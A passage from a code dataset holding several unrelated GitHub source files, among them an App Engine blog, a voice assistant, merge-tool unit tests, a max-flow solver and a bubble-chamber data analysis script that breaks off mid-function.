photon_in.Photon_in()\r\n ph_in.c = 10\r\n scell.shine(ph_in)\r\n scell.display_attributes()\r\n print(\"Jout:{:.3f}(A/m^2)\".format(scell.Jouthc(0.2/2*nu.eV)[0]))\r\n print(\"Pout:{:.3f}(W/m^2)\".format(scell.Pouthc(0.2/2*nu.eV)[0]))\r\n # print(\"MaxPout:{:.3f}(W/m^2)\".format(scell.maxPouthc()[0]))\r\n\r\n test.IV(scell)\r\n test.PV(scell)\r\n test.maxPouthc_opt_ESC(scell, 50)\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"thBoo39/hot-carrier-solar-cell-particle-energy-balance-solver","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"12615630864","text":"import os\r\nimport sys\r\nfrom google.appengine.ext.webapp import template\r\n\r\nimport cgi\r\nimport datetime\r\nimport wsgiref.handlers\r\nimport logging\r\n\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import webapp\r\n\r\nimport pojo\r\n#sys.path.append('utils')\r\n\r\n\r\nclass MainPage(webapp.RequestHandler):\r\n def get(self):\r\n size = 10\r\n currpage = self.request.get('p')\r\n if currpage == '':\r\n currpage = '1'\r\n page = int(currpage)\r\n offset = (page-1)*size\r\n \r\n greetings = db.GqlQuery(\"SELECT * \"\r\n \"FROM Greeting \"\r\n \"ORDER BY date DESC\")\r\n #Greeting.all().order('-date')\r\n\r\n if users.get_current_user():\r\n url = users.create_logout_url(self.request.uri)\r\n url_linktext = 'Logout'\r\n else:\r\n url = users.create_login_url(self.request.uri)\r\n url_linktext = 'Login'\r\n\r\n nums = greetings.count()\r\n\r\n pagestr = ''\r\n if page == 1 :\r\n if nums > size :\r\n pagestr = 'Next'\r\n else :\r\n pagestr = '1'\r\n else :\r\n pagestr = 'Pre'\r\n if nums > size*page :\r\n pagestr += '      ' + ' Next'\r\n\r\n template_values = {\r\n 'greetings': greetings.fetch(size,offset),\r\n 'url': url,\r\n 'url_linktext': url_linktext,\r\n 'pagestr': pagestr,\r\n 'curruser': users.get_current_user()\r\n }\r\n\r\n path = os.path.join(os.path.dirname(__file__), 'template/bloglist.html')\r\n self.response.out.write(template.render(path, template_values))\r\n\r\n\r\n\r\nclass ViewBlog(webapp.RequestHandler):\r\n def get(self,bid): \r\n greeting = db.get(bid)\r\n\r\n replys = db.GqlQuery(\"SELECT * \"\r\n \"FROM LogReply \"\r\n \"WHERE upid = :1 \"\r\n \"ORDER BY date DESC\",bid)\r\n\r\n isCurruser = users.get_current_user() == greeting.author\r\n isAdmin = users.is_current_user_admin()\r\n\r\n logging.debug('isCurruser = %s' % (isCurruser))\r\n logging.debug('isAdmin = %s' % (isAdmin))\r\n \r\n \r\n if isCurruser or isAdmin:\r\n isCanEdit = True\r\n else:\r\n isCanEdit = False\r\n\r\n template_values = {\r\n 'greeting': greeting,\r\n 'replys': replys,\r\n 'isCanEdit': isCanEdit\r\n }\r\n\r\n path = os.path.join(os.path.dirname(__file__), 'template/viewblog.html')\r\n self.response.out.write(template.render(path, template_values))\r\n \r\n# Anybody has the right to write blog~\r\nclass AddBlog(webapp.RequestHandler):\r\n def get(self):\r\n if users.get_current_user() == None :\r\n self.redirect(users.create_login_url(self.request.uri))\r\n \r\n template_values = {}\r\n path = os.path.join(os.path.dirname(__file__), 'template/addblog.html')\r\n self.response.out.write(template.render(path, template_values)) \r\n \r\n def post(self):\r\n greeting = pojo.Greeting()\r\n if users.get_current_user():\r\n greeting.author = users.get_current_user()\r\n greeting.title = 
self.request.get('title')\r\n greeting.tags = self.request.get('tags').split(' ')\r\n content = self.request.get('content')\r\n greeting.content = content\r\n if content:\r\n greeting.content_converted = text2html(content)\r\n greeting.put()\r\n self.redirect('/')\r\n else :\r\n self.redirect(\"/exception/hasnoright.html\")\r\n\r\n#Anybody who had writed the blog has the right to edit it\r\nclass EditBlog(webapp.RequestHandler):\r\n def get(self,bid):\r\n if users.get_current_user() == None :\r\n self.redirect(users.create_login_url(self.request.uri))\r\n \r\n greeting = db.get(bid)\r\n if users.get_current_user() == greeting.author or users.is_current_user_admin():\r\n template_values = {\r\n 'greeting': greeting,\r\n }\r\n path = os.path.join(os.path.dirname(__file__), 'template/editblog.html')\r\n self.response.out.write(template.render(path, template_values))\r\n else :\r\n self.redirect(\"/exception/hasnoright.html\")\r\n\r\n#Anybody who had writed the blog has the right to update it\r\nclass UpdateBlog(webapp.RequestHandler):\r\n def post(self):\r\n if users.get_current_user() == None :\r\n self.redirect(users.create_login_url(self.request.uri))\r\n \r\n greeting = db.get(self.request.get('key'))\r\n if users.get_current_user() == greeting.author or users.is_current_user_admin():\r\n greeting.title = self.request.get('title')\r\n greeting.tags = self.request.get('tags').split(' ')\r\n greeting.content = self.request.get('content')\r\n \r\n greeting.put()\r\n self.redirect('/')\r\n else:\r\n self.redirect(\"/exception/hasnoright.html\")\r\n \r\n#Anybody who had writed the blog has the right to delete it\r\nclass DeleteBlog(webapp.RequestHandler):\r\n def get(self,bid):\r\n if users.get_current_user() == None :\r\n self.redirect(\"/exception/hasnoright.html\")\r\n \r\n greeting = db.get(bid)\r\n if users.get_current_user() == greeting.author or users.is_current_user_admin():\r\n greeting.delete()\r\n self.redirect('/')\r\n else :\r\n self.redirect(\"/exception/hasnoright.html\")\r\n\r\n\r\n\r\n \r\n\r\napplication = webapp.WSGIApplication([\r\n ('/', MainPage),\r\n (r'/blog/(.*)', ViewBlog),\r\n ('/add', AddBlog),\r\n (r'/edit/(.*)', EditBlog),\r\n ('/update', UpdateBlog),\r\n (r'/delete/(.*)', DeleteBlog) \r\n], debug=True)\r\n\r\n\r\ndef main():\r\n logging.getLogger().setLevel(logging.INFO)\r\n wsgiref.handlers.CGIHandler().run(application)\r\n\r\n\r\nDIR_PATH = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))\r\nEXTRA_PATHS = [\r\n DIR_PATH,\r\n #os.path.join(DIR_PATH, 'utils'),\r\n]\r\nsys.path = EXTRA_PATHS + sys.path\r\nlogging.debug(sys.path)\r\nfrom utils.textconvert import text2html\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"yongboy/yongblog","sub_path":" yongblog --username yongboy/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8438303035","text":"import os.path\nimport shutil\nfrom unittest.mock import MagicMock, ANY, patch\nfrom importlib import import_module\n\nfrom git import Repo\n\nfrom mergeit.core.push_handler import PushHandler, DEFAULT_REMOTE\nfrom mergeit.core.config.config import Config\nfrom tests.common import MergeitTest\n\n\nREPO_NAME = 'test_repo'\nWORKSPACE = 'fixtures'\n\n\nclass PushHandlerTest(MergeitTest):\n\n def setUp(self):\n super().setUp()\n self.clean_workspace()\n os.mkdir(WORKSPACE)\n commits = [{\"id\": \"ffffff\",\n \"message\": \"Test commit message\\\\n\",\n \"timestamp\": 
\"2016-01-01T00:00:00+00:00\",\n \"url\": \"http://localhost/test/test_repo/commit/ffffff\",\n \"author\": {\"name\": \"test\",\n \"email\": \"test@localhost\"}}]\n self.config_source_mock = MagicMock()\n self.config_controller = Config(self.config_source_mock)\n self.configure({'name': REPO_NAME,\n 'uri': 'git@localhost:test/{}.git'.format(REPO_NAME)})\n self.repo_manager = MagicMock()\n self.push_handler = PushHandler(self.config_controller, 'master', commits, self.repo_manager)\n\n def tearDown(self):\n super().tearDown()\n self.clean_workspace()\n\n def clean_workspace(self):\n if os.path.exists(WORKSPACE):\n shutil.rmtree(WORKSPACE)\n\n def configure(self, data):\n self.config_controller.data = dict(**data)\n\n def test_init_runners(self):\n with open(os.path.join(WORKSPACE, '__init__.py'), 'w') as f:\n f.write('')\n variables = {'foo': 'world', 'bar': 'hell'}\n # Filter\n filter_module_name = 'test_filter'\n filter_class_name = 'TestFilter'\n with open(os.path.join(WORKSPACE, '{}.py').format(filter_module_name), 'w') as f:\n f.write('from mergeit.core.runner import Filter\\n'\n 'class {}(Filter): pass'.format(filter_class_name))\n\n filter_data = {'module': '{}.{}.{}'.format(WORKSPACE, filter_module_name, filter_class_name)}\n filter_extra = {'extra': 42, 'extra_var': 'hello, {foo}'}\n filter_data.update(filter_extra)\n filter_data_expected = filter_extra.copy()\n filter_data_expected['extra_var'] = filter_data_expected['extra_var'].format(**variables)\n # Hook\n hook_module_name = 'test_hook'\n hook_class_name = 'TestHook'\n with open(os.path.join(WORKSPACE, '{}.py').format(hook_module_name), 'w') as f:\n f.write('from mergeit.core.runner import Hook\\n'\n 'class {}(Hook): pass'.format(hook_class_name))\n hook_data = {'module': '{}.{}.{}'.format(WORKSPACE, hook_module_name, hook_class_name)}\n hook_extra = {'foo': 24, 'extra_info': 'bye, {bar}'}\n hook_data.update(hook_extra)\n hook_data_expected = hook_extra.copy()\n hook_data_expected['extra_info'] = hook_data_expected['extra_info'].format(**variables)\n # Configure\n self.configure({'variables': variables,\n 'filters_def': {filter_module_name: filter_data},\n 'hooks_def': {hook_module_name: hook_data}})\n # Import\n filter_module = import_module('{}.{}'.format(WORKSPACE, filter_module_name))\n filter_class = getattr(filter_module, filter_class_name)\n hook_module = import_module('{}.{}'.format(WORKSPACE, hook_module_name))\n hook_class = getattr(hook_module, hook_class_name)\n\n self.push_handler.init_runners()\n\n filter_ = self.push_handler.filters[filter_module_name]\n hook = self.push_handler.hooks[hook_module_name]\n self.assertIsInstance(filter_, filter_class)\n self.assertIsInstance(hook, hook_class)\n self.assertEqual(filter_.push_handler, self.push_handler)\n self.assertEqual(hook.push_handler, self.push_handler)\n self.assertEqual(filter_.config, filter_data_expected)\n self.assertEqual(hook.config, hook_data_expected)\n\n @patch('mergeit.core.push_handler.import_module')\n def test_process_merge_pair__merge(self, import_mock):\n # self.configure({})\n source_branch = 'master'\n target_branch = 'develop'\n test_filter_class = MagicMock()\n test_hook_class = MagicMock()\n test_filter = test_filter_class()\n test_hook = test_hook_class()\n test_filter.run.return_value = target_branch\n test_hook.run.return_value = target_branch\n test_filter_module = 'test_filter'\n test_hook_module = 'test_hook'\n self.push_handler.filters = {test_filter_module: test_filter}\n self.push_handler.hooks = {test_hook_module: test_hook}\n 
import_mock(test_filter_module).return_value = test_filter_class\n import_mock(test_hook_module).return_value = test_hook_class\n conflict = MagicMock()\n self.repo_manager.merge = MagicMock(return_value=conflict)\n\n self.push_handler.process_merge_pair(source_branch, target_branch, [test_filter_module], [test_hook_module])\n\n self.repo_manager.merge.assert_called_once_with(source_branch, target_branch)\n test_filter.run.assert_called_once_with(ANY, source_branch, target_branch) # TODO: ANY - regexp match\n test_hook.run.assert_called_once_with(source_branch, target_branch, conflict)\n\n @patch('mergeit.core.push_handler.import_module')\n def test_process_merge_pair__merge_cancel(self, import_mock):\n # self.configure({})\n source_branch = 'master'\n target_branch = 'develop'\n test_filter_class = MagicMock()\n test_hook_class = MagicMock()\n test_filter = test_filter_class()\n test_hook = test_hook_class()\n test_filter.run.return_value = None\n test_hook.run.return_value = target_branch\n test_filter_module = 'test_filter'\n test_hook_module = 'test_hook'\n self.push_handler.filters = {test_filter_module: test_filter}\n self.push_handler.hooks = {test_hook_module: test_hook}\n import_mock(test_filter_module).return_value = test_filter_class\n import_mock(test_hook_module).return_value = test_hook_class\n self.repo_manager.merge = MagicMock()\n\n self.push_handler.process_merge_pair(source_branch, target_branch, [test_filter_module], [test_hook_module])\n\n self.repo_manager.merge.assert_not_called()\n test_filter.run.assert_called_once_with(ANY, source_branch, target_branch) # TODO: ANY - regexp match\n test_hook.run.assert_not_called()\n\n def test_handle(self):\n source_branch = 'master'\n target_branch = 'develop'\n self.configure({'dependencies': {'^{}$'.format(source_branch): {'targets': [target_branch]}}})\n self.push_handler.process_merge_pair = MagicMock()\n\n self.push_handler.handle()\n\n self.push_handler.process_merge_pair.assert_called_once_with(ANY, target_branch, [], []) # FIXME: pass filters and hooks\n\n def test_handle__variables(self):\n source_version = '3\\\\.0'\n target_version = '4\\\\.0'\n source_branch = 'v{source_version}'\n target_branch = 'v{target_version}'\n self.push_handler.branch = 'v3.0'\n self.configure({'dependencies': {'^{}$'.format(source_branch): {'targets': [target_branch]}},\n 'variables': {'source_version': source_version,\n 'target_version': target_version}})\n self.push_handler.process_merge_pair = MagicMock()\n\n self.push_handler.handle()\n\n self.push_handler.process_merge_pair.assert_called_once_with(ANY, target_branch.format(target_version=target_version), [], []) # FIXME: pass filters and hooks\n","repo_name":"insolite/mergeit","sub_path":"tests/test_core/test_push_handler.py","file_name":"test_push_handler.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"36487239291","text":"# Activity: Python 1 Post Activity\n# File: Py1_PA_Task1_katherto.py\n# Date: September 17, 2015\n# By: Kathryn Atherton\n# katherto\n# Section: 4\n# Team: 59\n#\n# ELECTRONIC SIGNATURE\n# Kathryn Atherton\n# The electronic signature above indicates that the program \n# submitted for evaluation is my individual work. I have\n# a general understanding of all aspects of its development\n# and execution.\n#\n# This program demonstrates the equivalence between doing \n# calculations with decimal numbers and doing the same\n# calculations with fractions. 
It generates two random \n# numbers, rounds them to the nearest tenth, adds them\n# together, converts the numbers to fractions, and adds \n# them together.\n\nfrom random import uniform\nfrom fractions import Fraction\n\na = uniform(0,10)\nb = uniform(0,10)\n\nc = round(a,1)\nd = round(b,1)\n\ndecimal = c + d\n\ne = Fraction(c)\nf = Fraction(d)\n\nfraction = e + f\n\nprint('First Random Number:', a)\nprint('Second Random Number:', b)\n\nprint(c, '+', d, '=', decimal)\nprint(e, '+', f, '=', fraction)","repo_name":"class-archives/ENGR-141","sub_path":"Fall-2015/Post-Activities/Python-1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15607526642","text":"import pyttsx3 # text to speech\r\nimport speech_recognition as sr # speech to text \r\nimport wikipedia\r\nimport webbrowser #for search\r\nimport requests\r\nimport datetime\r\nimport pyjokes\r\nimport playsound\r\nfrom gtts import gTTS #text into audio\r\nimport os # to interact with operating system\r\nimport wolframalpha # to calculate expertlevel answers\r\nfrom selenium import webdriver #automates web browsers\r\ndef speak(audio):\r\n engine = pyttsx3.init(\"sapi5\")\r\n voices = engine.getProperty(\"voices\")\r\n engine.setProperty('voice', voices[1].id)# 1 for female and 0 for male voice\r\n rate=engine.getProperty('rate')\r\n engine.setProperty('rate',150)\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\ndef sptext():\r\n r= sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold =1 \r\n audio = r.listen(source)\r\n try:\r\n print(\"Recognizing...\")\r\n data = r.recognize_google(audio, language='en-in')\r\n print(\"User said:\" + data + \"\\n\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"I didnt understand\")\r\n return \"None\"\r\n return data\r\n\r\nif __name__ == \"__main__\":\r\n speak(\"Voice Assistance Activated \")\r\n speak(\"How can i help you\")\r\n while True:\r\n data= sptext().lower()\r\n if 'wikipedia' in data:\r\n speak(\"Searching Wikipedia ...\")\r\n data= data.replace(\"wikipedia\", '')\r\n results = wikipedia.summary(data, sentences=2)\r\n speak(\"According to wikipedia\")\r\n speak(results)\r\n elif ' Who are you' in data:\r\n speak(\"Hello I am Najiya\")\r\n elif 'open youtube' in data:\r\n speak(\"opening youtube\")\r\n webbrowser.open(\"youtube.com\")\r\n elif 'open google' in data:\r\n speak(\"opening google\")\r\n webbrowser.open(\"google.com\")\r\n elif 'open stackoverflow' in data:\r\n speak(\"opening stackoverflow\")\r\n webbrowser.open(\"stackoverflow.com\")\r\n elif 'open spotify' in data:\r\n speak(\"opening spotify\")\r\n webbrowser.open(\"spotify.com\")\r\n elif 'open whatsapp' in data:\r\n speak(\"opening whatsapp\")\r\n loc = \"C:\\\\Users\\\\jaspr\\\\AppData\\\\Local\\\\WhatsApp\\\\WhatsApp.exe\"\r\n os.startfile(loc)\r\n elif 'play music' in data:\r\n speak(\"opening music\")\r\n webbrowser.open(\"spotify.com\")\r\n elif 'play music' in data:\r\n speak(\"opening music\")\r\n webbrowser.open(\"spotify.com\")\r\n elif 'local disk d' in data:\r\n speak(\"opening local disk D\")\r\n webbrowser.open(\"D://\")\r\n elif 'local disk c' in data:\r\n speak(\"opening local disk C\")\r\n webbrowser.open(\"C://\")\r\n elif 'local disk e' in data:\r\n speak(\"opening local disk E\")\r\n webbrowser.open(\"E://\")\r\n elif 'joke' in data:\r\n speak(\"Opening joke\")\r\n 
joke_1=pyjokes.get_joke(language=\"en\",category=\"netural\")\r\n print(joke_1)\r\n elif 'notepad' in data:\r\n speak(\"Opening Notepad\")\r\n webbrowser.open(\"Notepad://\")\r\n elif 'now time' in data:\r\n speak(\"Current Time is\")\r\n time=datetime.datetime.now()\r\n print(time)\r\n elif 'exit' in data:\r\n speak(\"Thank you...\")\r\n break\r\n \r\n","repo_name":"Najo2311/Voice_Assistant","sub_path":"Voice Assistant using Python/mini_python.py","file_name":"mini_python.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16169233555","text":"# 프로그래머스 코딩테스트 연습문제 - python\n\n### 체감 난이도: 1\n### list 활용\n### https://school.programmers.co.kr/learn/courses/30/lessons/120904?language=python3\n\ndef solution(num, k):\n num_lst = list(map(int, str(num)))\n \n try:\n return num_lst.index(k) + 1\n except:\n return -1","repo_name":"Paul-scpark/Coding-test","sub_path":"programmers/python/1_숫자찾기.py","file_name":"1_숫자찾기.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24170192011","text":"import io\nimport sys\n#sys.setrecursionlimit(10**7)\nfrom collections import deque,defaultdict\nfrom heapq import heappush,heappop \nfrom itertools import product,combinations,accumulate\nfrom bisect import bisect_right,bisect_left\ndef input(): return sys.stdin.readline().strip()\ndef INT(): return int(input())\ndef MAP(): return map(int,input().split())\ndef LIST(): return list(map(int,input().split()))\nINF = float('inf')\nimport math\ndirc = [(0,1),(0,-1),(1,0),(-1,0)]\n#dirc2 = [(0,1),(0,-1),(1,0),(-1,0),(-1,-1),(-1,1),(1,-1),(1,1)]\n#mod = 10**9+7\n#mod = 998244353\n#--------------------------------------------------------------\n_INPUT = \"\"\"\\\n6 7\n1 2 5\n1 4 4\n2 3 4\n2 5 7\n3 6 3\n4 5 3\n5 6 5\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n#--------------------------------------------------------------\n\"\"\"\n<考察>\n\n<キーワード>\n・最大フロー、最小カットについて\nフロー:ある場所からある場所まで運んだ荷物の量\n・残余ネットワーク:あとフローをどれだけ追加でき、どれだけ戻すことができるかを重みつき有向グラフで著したもの\n(逆向きにグラフを貼ればよい)\n・フロ- a->b (3/8)あと5だけ流せる、3戻すことも可能\n・残余ネットワーク a->b(5) b->a (3)\n\n<ポイント>\n最大フローのアルゴリズムについて\n1.残余ネットワークでsからtまで辿れるような道を適当に見つけ、その道に流せるだけのフローを流す\n2.その際に、残余ネットワークの辺の重みを書き換えるのを忘れないように\n3.1,2を繰り返し、sからtまで流せる道がなくなった時のフローが最大フローになる\n\nなぜこのアルゴリズムで成り立つか\n->残余ネットワークを考えることにより、仮に、先に追加した増大道が邪魔したとしても\n逆向きの辺(押し戻す部分)を張っていることにより、正しく最大フローを求められる。\n\n・計算量について\nDinicのアルゴリズムはO(M*N^2)\nフォールドファーカーソンO(|最大フローf|*|M|)\n\n<おまけ>\n・無向グラフの時->双方向に辺を張る\n・複数始点、複数終点がある時、新たな始点、終点を一つ用意してそれらにつなぐ\n(このような考え方は重要,但し、始点と終点のペアが決まっているときはNP完全)\n・最大流の答え=最小カットの値\n・最小カットとは:頂点1からNまで到達できないようにするのに、最小で何円を使う必要があるか\n\"\"\"\n#--------------------------------------------------------------\nfrom collections import deque\nclass FlowGraph:\n '''流量(フロー)を扱うグラフ\n 実装済み:\n ・最大流1 flow1() O(|E||V|^2)\n '''\n def __init__(self, N):\n '''初期化 FlowGraph(頂点数)\n 使い方:\n 平面座標を扱うときは (i, j) → i * W + j 等で整数に変換する\n Args:\n N (int): 頂点数\n Returns:\n void\n '''\n self.n = N # 頂点数\n self.edges = [[] for i in range(N)] # 辺の情報\n self.pos = [] # 辺の番号 (From, edges[From]内の辺情報の位置)\n def addEdge(self, From, To, cap=1):\n '''辺の追加 addEdge(始点, 終点, 容量)\n Args:\n From (int): 始点の番号\n To (int): 終点の番号\n cap (int?): 辺の容量, 初期値 1\n Returns:\n int: 辺の番号\n '''\n assert 0 <= From < self.n\n assert 0 <= To < self.n\n assert 0 <= cap\n m = len(self.pos)\n self.pos.append((From, len(self.edges[From])))\n self.edges[From].append({'to':To, 'cap':cap, 
'rev':len(self.edges[To])})\n self.edges[To].append({'to':From, 'cap':0, 'rev':len(self.edges[From])-1})\n return m\n\n def getEdge(self, i):\n '''辺情報の取得 getEdge(辺番号)\n Args:\n i (int): 辺の番号\n Returns:\n dict: 辺の情報 {'from':始点,\n 'to':終点,\n 'cap':容量,\n 'flow':流量}\n '''\n m = len(self.pos)\n assert 0 <= i < m\n e = self.edges[self.pos[i][0]][self.pos[i][1]]\n reve = self.edges[e['to']][e['rev']]\n return {'from':self.pos[i][0],\n 'to':e['to'],\n 'cap':e['cap'] + reve['cap'],\n 'flow':reve['cap']}\n\n def getGraph(self):\n '''全ての辺の情報を取得\n Returns:\n list: i番目の辺のdict\n '''\n res = []\n for i in range(len(self.pos)):\n res.append(self.getEdge(i))\n return res\n\n def changeEdge(self, i, cap, flow):\n '''辺の流量を変更する changeEdge(辺番号, 新容量, 新流量)\n Args:\n i (int): 変更する辺の番号\n cap (int?): 変更後の容量\n flow (int?): 変更後の流量\n Returns:\n void\n '''\n m = len(self.pos)\n assert 0 <= i < m\n assert 0 <= flow <= cap\n e = self.edges[self.pos[i][0]][self.pos[i][1]]\n reve = self.edges[e['to']][e['rev']]\n e['cap'] = cap - flow\n reve['cap'] = flow\n\n def flow1(self, st, gl, flowlimit=(1<<63)-1):\n '''最大流を求める flow(始点, 終点, 流量の上限) O(|E||V|^2)\n Args:\n st (int): 始点の番号\n gl (int): 終点の番号\n flowlimit (int?): 流量の上限 初期値は64bit整数最大値\n Returns:\n int?: 最大の流量\n '''\n assert 0 <= st < self.n\n assert 0 <= gl < self.n\n dist = [0] * self.n # stからの距離\n iter = [0] * self.n #\n q = deque()\n\n def bfs(): # stからの距離を求めておく\n for i in range(self.n):\n dist[i] = -1\n dist[st] = 0\n q = deque()\n q.append(st)\n while q:\n now = q.popleft()\n for e in self.edges[now]:\n if e['cap'] == 0 or dist[e['to']] >= 0:\n continue\n dist[e['to']] = dist[now] + 1\n q.append(e['to'])\n\n def dfs(func, v, f): # v → gl に流せる f\n if v == gl:\n return f\n while iter[v] < len(self.edges[v]):\n e = self.edges[v][iter[v]]\n if e['cap'] > 0 and dist[v] < dist[e['to']]:\n d = func(func, e['to'], min(f, e['cap']))\n if d > 0:\n self.edges[v][iter[v]]['cap'] -= d\n self.edges[e['to']][e['rev']]['cap'] += d\n return d\n iter[v] += 1\n return 0\n\n flow = 0\n while flow < flowlimit:\n bfs()\n if dist[gl] < 0:\n return flow\n iter = [0] * self.n\n f = 0\n while True:\n f = dfs(dfs, st, flowlimit-flow)\n if f <= 0:\n break\n flow += f\n return flow\n \n \nN,M = MAP()\nf = FlowGraph(N)\nfor _ in range(M):\n a,b,c = MAP()\n a,b = a-1,b-1\n f.addEdge(a,b,c)\nprint(f.flow1(0,N-1))","repo_name":"kaichan1224/Atcoder","sub_path":"グラフ問題/最大流問題/A68.py","file_name":"A68.py","file_ext":"py","file_size_in_byte":7345,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16141332870","text":"# Author: Trent Cwiok\n#\n# The purpose of this program is to, given a file name containing\n# data collected from the instruments attached to the bubble chamber,\n# create a data structure capable of storing the instruments and\n# their readouts. The information for any given instrument should\n# then be easily accessible and printable. 
Additional functionality\n# for plotting any given instrument readout versus time is also\n# included.\n\n# import pdb\nimport numpy as np\n# import matplotlib.pyplot as plt\n# import SBCcode as sbc\n\n\n#np.set_printoptions(threshold=np.nan)\n\n\ndef DataTrim(dictionary, instrument):\n '''\n Given a dictionary constaining instrument data, it uses\n TriggerLatch to trim away unwanted data points where the\n trigger is not latched\n '''\n tick = 0\n\n instrument = str(instrument)\n for i in range(len(dictionary['TriggerLatch'])):\n if dictionary['TriggerLatch'][i] == 0:\n tick = tick + 1\n trim_PT = np.zeros(tick)\n trim_time = np.zeros(tick)\n track = 0\n if instrument in dictionary:\n for value in range(len(dictionary[instrument])):\n if dictionary['TriggerLatch'][value] == 0:\n trim_PT[track] = dictionary[instrument][value]\n trim_time[track] = dictionary['elapsed_time'][value]\n track = track + 1\n\n return trim_PT\n\n# DataTrim(d,'PT4')\n\n\ndef TrimAll(dictionary):\n\n d = {}\n for i in range(1, 10):\n index = str(i)\n d.update({'trimPT' + str(i): DataTrim(dictionary, 'PT' + index)})\n return d\n\n\ndef ShowIndex(dictionary):\n for key in dictionary:\n print(key + str(dictionary[key].shape) + str(dictionary[key].dtype))\n\n\ndef Pbin(dictionary, instrument, edge):\n '''\n sort pressures into bins of 1 psi\n '''\n if instrument in dictionary:\n Bin = np.histogram(dictionary[instrument],\n bins=edge, range=(edge[0], edge[-1]))\n else:\n Bin = np.histogram(np.float64([0]) + np.nan,\n bins=edge, range=(edge[0], edge[-1]))\n BinTime = np.zeros(len(Bin[0]))\n for i in range(len(Bin[0])):\n x = Bin[0][i] * 0.005\n BinTime[i] = x\n dictionary.update({'Bin' + instrument: Bin[1],\n 'Count' + instrument: Bin[0],\n 'BinTime' + instrument: BinTime})\n '''\n print Bin\n plt.hist(dictionary[instrument], bins=step)\n plt.show()\n '''\n return\n\n\ndef BinAll(dictionary, edge):\n for i in range(1, 10):\n index = str(i)\n Pbin(dictionary, 'trimPT' + index, edge)\n return\n\n\ndef tGood(dictionary, instrument='PT4'):\n Pgood = np.float64(0)\n tg = np.float64(0)\n\n for i in range(1, len(dictionary[instrument])):\n if abs(dictionary[instrument][i] -\n dictionary['PressureSetpoint'][i]) <= 0.3:\n Pgood = Pgood + 1\n tg = tg + ((dictionary['elapsed_time'][i] -\n dictionary['elapsed_time'][i - 1]))\n return tg\n\n\ndef tEvent(dictionary):\n Tevent = np.float64(0)\n dt = np.diff(dictionary['elapsed_time'][0:2])\n Tevent = np.sum(dictionary['TriggerLatch'] == 0) * dt\n\n latch_lowtohigh = np.nonzero(np.diff(dictionary['TriggerLatch']) == 1)\n time_of_compression = dictionary['elapsed_time'][latch_lowtohigh[-1]]\n\n return Tevent\n\n\ndef Pevent(dictionary, instrument):\n latch_lowtohigh = np.nonzero(np.diff(dictionary['TriggerLatch']) == 1)[0]\n pressure_of_compression = np.float64(0) + np.nan\n if instrument in dictionary and \\\n latch_lowtohigh.shape[0] > 0 and \\\n latch_lowtohigh[-1] >= 40:\n pressure_of_compression = \\\n dictionary[instrument][latch_lowtohigh[-1] - 40]\n\n return pressure_of_compression\n\n\ndef PumpActiveTime(dictionary):\n tPumpPre = np.float64(0)\n tPumpPost = np.float64(0)\n if 'PUMP' in dictionary:\n for i in range(1, int(len(dictionary['PUMP']) / 2)):\n if dictionary['PUMP'][i] == 1:\n tPumpPre = tPumpPre + ((dictionary['elapsed_time'][i] -\n dictionary['elapsed_time'][i - 1]))\n for i in range(int(len(dictionary['PUMP']) / 2), len(dictionary['PUMP'])):\n if dictionary['PUMP'][i] == 1:\n tPumpPost = tPumpPost + ((dictionary['elapsed_time'][i] -\n dictionary['elapsed_time'][i - 
1]))\n    tPump = np.array([tPumpPre, tPumpPost], dtype=np.float64)\n    return tPump\n\n\ndef PumpActiveCycle(dictionary):\n    CycleCountPre = np.int32(0)\n    CycleCountPost = np.int32(0)\n    if 'PUMPcycles' in dictionary:\n        for i in range(1, len(dictionary['PUMPcycles']) // 2):\n            dC = dictionary['PUMPcycles'][i] - dictionary['PUMPcycles'][i - 1]\n            if dC > 0:\n                CycleCountPre = CycleCountPre + dC\n        for i in range(len(dictionary['PUMPcycles']) // 2,\n                       len(dictionary['PUMPcycles'])):\n            dC = dictionary['PUMPcycles'][i] - dictionary['PUMPcycles'][i - 1]\n            if dC > 0:\n                CycleCountPost = CycleCountPost + dC\n    CycleCount = np.array([CycleCountPre, CycleCountPost], dtype=np.int32)\n    return CycleCount\n\n\ndef atTime(dictionary, time, instrument):\n    index = 0\n    while time >= dictionary['elapsed_time'][index]:\n        index = index + 1\n    if time == dictionary['elapsed_time'][index - 1]:\n        return dictionary[instrument][index - 1]\n    else:\n        x = (dictionary[instrument][index] +\n             dictionary[instrument][index - 1]) / 2\n        print(index)\n        return x\n\n\ndef Tdata(dictionary, instrument):\n    Tmin = np.float64(0) + np.nan\n    Tmax = np.float64(0) + np.nan\n    Tavg = np.float64(0) + np.nan\n    if instrument in dictionary:\n        Tmin = min(dictionary[instrument])\n        Tmax = max(dictionary[instrument])\n        Tavg = np.mean(dictionary[instrument])\n    return (Tmin, Tavg, Tmax)\n\n\ndef main(dictionary, edge=np.cumsum(np.ones(88)) - 1, targetPT='PT4'):\n    ## Issues: The 88 above should be dynamically selected to match what len(temp[\"BinTimetrimPT1\"]) evaluated to\n    ## below. This will work *for now*...\n\n    default_output = 